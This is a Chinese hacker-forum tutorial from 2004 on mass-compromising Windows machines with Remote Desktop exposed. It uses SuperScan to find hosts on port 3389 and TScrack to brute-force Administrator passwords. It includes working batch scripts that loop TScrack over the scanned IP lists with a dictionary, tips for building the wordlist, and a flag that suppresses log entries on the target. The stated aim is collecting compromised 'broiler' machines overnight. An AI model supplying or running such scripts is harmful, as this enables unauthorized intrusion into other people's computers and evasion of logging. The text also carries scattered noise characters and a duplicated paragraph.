|
作者:霜风 QQ:14226581 . q) t/ b( S/ g% H
终端服务又称3389服务,它提供了通过作为终端仿真器工作的“瘦客户机”软件远程访问服务器桌面的能力。终端服务只把该程序的用户界面传给客户机。客户机然后返回键盘和鼠标单击动作,以便由服务器处理。每个用户都只能登录并看到它们自己的会话,这些会话由服务器操作系统透明地进行管理,而且与任何其他客户机会话无关。客户软件可以运行在多个客户机硬件设备上,包括计算机和基于 Windows 的终端。其他设备,如 Macintosh 计算机或基于 UNIX 的工作站,也可以使用其他第三方的软件连接到终端服务器。$ {: z; H% S8 Q4 G
这样的服务因为操作简便和功能强大而著称,深受广大管理员和黑友们的欢迎,其实这个题目在很早以前就有前辈写过,但适值今日,那个老方法成功率已经越老越低了,为什么呢?要我先把前辈们的方法概述一下:
5 u5 R/ s [6 ]; K9 T7 ^6 \. ~. t首先用superscan把所有开3389的主机都扫下来,接着用x-scan扫他们的弱口令,具体方法如下:7 M& O7 f) A, ~% R8 v" u
先打开superscan3如图14 v5 V1 H5 n9 R
8 N3 g* B1 W9 f
此主题相关图片如下:/ J5 D* H2 {' S4 U* \
" c# S! ~' F; j, Y: Y
8 s6 o: w. v* L9 t7 b
接着输入其实IP和终止IP,填好以后在把“所有端口定义”的两个空改为3389,接着把左边的速度调到最快,最后点开始,进度条走完以后,点删除,整理点展开所有以后如图2
4 d( ^' Q6 d; B- @' O( q
4 p: C1 o+ n* [: s此主题相关图片如下:
& `: l4 I: l' [& g" I* u
# K: J: N+ c/ D( E$ t: M3 K ! V2 [1 k5 ~9 E% @
然后点保存,接着打开保存的文件,把所有的“* + ”和“|___ 3389”都删除.. U. d& ^* f8 S% q: ^& z
这里告诉大家一个小技巧,进入—替换—在查找内容把“* +”填上,然后点全部替换如图3
0 {) C/ I% o3 X" P+ ^8 ^+ j0 p1 N1 s1 s! c' e5 a
此主题相关图片如下: R, l. o! x% C n8 ~
8 m( L2 \; h6 ]4 {- i/ S7 _
% P) f, e8 {7 h# y5 r“|___ 3389”的删除方法如上,最后输入空格,把空格替换掉,整理完毕后如图4。& L5 _# Y! t0 m& V1 ?) J# T
5 _8 ~4 p# Z. a$ s- g. H* s" G
此主题相关图片如下:/ `% x8 L4 H7 }. }! `
& X( z+ B+ D9 Z" F, o% W接着打开X-SCAN,进入—设置—扫描参数,把从“从文件获取主机列表”打上勾,选上刚刚整理的文件后如图5
- }0 i" Y& n5 [; i5 P: p! J' C
5 ]" h0 @# v( |) M$ R此主题相关图片如下:6 l2 Q9 [& }. I
f2 l+ |! k7 J8 r' e9 X
进入“扫描模块”只把两项打上勾:"NT-server弱口令""sql-server弱口令”,OK后就点绿箭头开始了,这种方法在以前是非常有效的,一天搞几十个不是问题,但现在许多用管理员已经把139后445的端口封了,这样就不能得到netbios信息了,X-SCAN也就不能扫NT若口令了,对付XP更是束手无策,SQL-SERVER若口令更加如大海落针,读者们肯定又要问了,我们到底怎么办呢?别急,我马上娓娓到来。
( y3 ~, w# W' T* I/ F% v所需工具:TScrack.exe所需工具:TScrack.exe,一个记事本。
& q6 p$ U4 i; I2 ~+ H* W7 G5 vTScrack.exe是针对终端服务的一个密码破解程序.这个程序被微软推荐给用户使用,来检查终端服务密码的强壮性.程序使用msrdp控件,可在本地虚拟远程终端连接窗口,通过密码字典进行破解. 可以指定多种参数,使用比较灵活,破解速度视攻击主机与被攻击主机网络带宽而变化.,一个记事本。
0 _( |* `' x# G9 x$ O) f( f$ Y此软件可以只利用3389服务的登陆框猜解密码,不再以来原先的139端口了,废话少说来看具体操作。
" e9 }+ [- s& B/ U在CMD下启动TScrack.exe,会首先分离出main_scraper.nnt,MSRDP.OCX,MSWINSCK.OCX这几个文件,然后就可以正常运行了,TScrack.exe一共有这几个选项:" `- [- d$ ?' ]; z9 k! F
-h : Print usage help and exit% E& ~% E. ?# G: ~. [, A5 [% U i
-V : Print version info and exit) M! [1 x9 v H9 f4 }4 s
-s : Print chipher strenght info and exit
G, k! Z6 l' T! c-b : Enable failed password beep
$ \9 u! i9 @0 C/ R-t : Use two simultaneous connections [EXPERIMENTAL]
: w0 u( f) B! }3 R5 I- \-N : Prevent System Log entries on targeted server% z2 L7 v: B a, I" B- U: A
-U : Uninstall tscrack and remove components
, T; v% S$ ^% m% s7 a-f <number> : Wordlist entry to start cracking with- X, W5 u0 e' C3 a
-F <delay> : Sampling Frequency (Delay between samples in ms)% ?, J1 s5 ~9 q
-l <user> : Account name to use, defaults to Administrator2 E9 f& S; X% \9 `/ ~
-w <wordlist> : Wordlist to use; tscrack tries blank passes if omitted8 e5 ]; X$ b6 \9 ?# V. M
-p <password> : Use <password> to logon instead of wordlist/blank pass8 R+ Q) t$ y6 _ ^
-D <domain> : Specify domain to attempt logon to
# e4 ~7 @ ?, M9 d) S i' ~9 ~: D- p3 Y! G) _0 V' N
6 J& w7 H |& n' Z
我就帮忙翻译一下吧,翻译得不好可不要怪我啊:
) Q g4 g! e/ }- s-h : 显示使用帮助然后退出
/ {( Q* _7 T+ a6 z# F& Y( t-V : 显示版本信息然后退出' v) K2 s% h% z) T/ K- E' }
-s : 显示 chipher strenght信息然后退出(chipher strenght具体意思不明)! B; J E8 v4 f8 H% m
-b : 密码错误时发出声音# B1 {" S, o- I3 \9 X
-t : 同时发出多个连接,就是多线程。
' s" q3 o' `/ T! m$ G-N : Prevent System Log entries on targeted server
6 C! v1 w' l z* r% A1 |3 v; n% j-U : 卸载移除tscrack组件。0 F- z6 J0 O/ J; T
-f <number> : 使用-F后面的密码。, h M$ o" L& _. D3 c1 p, m4 `7 e7 m
-F <delay> : 间隔时间(频率); Y+ V6 N3 {7 j( q( Y% M9 t2 E- ?3 C
-l <user> : 使用-L后面的用户名) J- r# c% N5 b0 Y
-w <wordlist> : 使用-W后面的字典
3 x% d7 j, ~ M% E4 w; ]; b-p <password> : 使用-W后的密码
9 b. P4 ?6 \7 c: l/ K. [0 Q-D <domain> : 登陆主页面?
/ b! @: R" T9 r8 |& z相信通过上面的功能介绍,大家对TScrack.exe都应该有所了解了吧,下面就是实例操作了,首先就是用SUPERSCAN把3389机扫下来吧,整理后保存,IP数一般在100个左右,保存好后,就用记事本写一段BAT了名字为3389,把下面的代码写入记事本:+ W u( f+ y. g! S, N! H! t1 ~; ]( c
@if not exist IpcScan.txt goto noscan: O, x9 _; G9 K! i0 a3 O- y
@for /f "tokens=1 delims= " %%i in (3389.txt) do call hack.bat %%i
1 Y" Y( @$ r( p) ~7 T* t+ C:noscan8 D3 C- \2 t7 @" g3 L9 ^# S
@echo 3389.txt no find or scan faild 
X2 \/ p' }; |8 w这段代码的大概意思是从3389.txt(刚刚用SUPERSCAN保存后的文件)里取一段字符,接着运行hack 这段字符(也就是IP)6 `7 N4 D5 |4 b8 e) l: {
保存后把后错名改为BAT就可以了。/ {$ c. V& G1 H& D2 D A4 i7 d
还写一个BAT,名字为HACK.BAT,代码如下:
3 d) E/ s* I; \" z4 L5 X@if not exist tscrack.exe goto noscan
. a) w/ X& I# g7 u' D" X@tscrack %1 -l administartor -w pass.dic >>rouji.txt6 N# F v4 A, b3 }& k
:noscan
7 j1 n* G0 f4 ~ R, q2 |@echo tscrack.exe no find or scan faild
8 a) t9 C3 g- W+ J) \6 U这段代码的意思是:运行tscrack,用户名为administrator 字典文件为PASS.DIC
4 n3 v7 j" X/ x8 `制作方法如上。' y: X4 Q5 k" e9 e) k
然后就是制作字典了,制作字典最关键的就是选一个好的字典工具,我这里选择了"万能钥匙"这个字典生成器,虽然是老了一点,但功能绝对是所有字典里最强大的,唯一的缺点就是不能使用基本字符定义,不过其他功能还是很不错,界面如图6
* A; b" v Z5 Z$ O0 w
8 {6 O5 o) i3 q; P此主题相关图片如下:
$ h/ ? \( \- T2 u8 g" c# V怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.& w. ^6 F4 A# ]- g9 n
最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7
" T* j* _- B1 q0 Y: e2 I& n* A! [' ]. ~9 `, W/ E
此主题相关图片如下:4 Q# {' f; [- @# J5 j
' @0 N$ c: O }, Q& s7 }& e怎么配置网上有许多这方面的文章,读者们可以自己去研究,这里要注意的是密码数应该保持在2000左右,最好在万能钥匙的倒数第二步里选择常用的一些数字和英文,自己再加一点,例如:5201314,12345678等等,配置完成以后保存为PASS.dic.8 D: T/ l1 D# B5 u8 _; ^- V n
最后把3389.TXT,3389.BAT,HACK.BAT,PASS.DIC以及TSCRACK所有的文件放在一个文件夹里,最后就是启动3389.BAT如图7,接下来做的事就是等待了,及结果保存在ROUJI.TXT里,放在肉鸡上一晚上搞10来个极品肉鸡都有可能,也欢迎大家与我交流~ | 
IP卡
狗仔卡
发表于 2004-10-6 09:51
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
